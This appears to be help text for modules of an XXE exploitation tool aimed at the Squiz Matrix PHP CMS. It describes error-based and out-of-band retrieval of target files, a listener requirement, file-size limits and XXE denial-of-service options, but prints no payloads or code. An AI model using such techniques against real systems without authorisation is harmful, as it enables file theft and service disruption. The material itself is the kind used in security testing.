This module utilizes error-message-based reflection to retrieve the contents of the target file, but the contents are base64-encoded before inclusion, so binary data can generally be retrieved. It is mainly included for demonstration purposes. Use of the SOS-12-007-YU-OOB module is strongly recommended instead.

Squiz Matrix is a PHP-based application, so directory content enumeration is not possible - a specific target file (or list of specific target files) must be specified. In addition, while text and binary content can both be retrieved, the maximum file size is limited to about 4KB unless certain components on the target were compiled with nonstandard options.

This module uses Yunusov-Osipov-style out-of-band exploitation of a PHP-based application. As a result, it requires the use of an instance of She Wore A Mirrored Mask which is accessible (either directly, or via transparent TCP port-forwarding) to the target system.

This module will generally *not* be successful at sending XXE denial-of-service attacks (--dos-lulz or --dos-quad).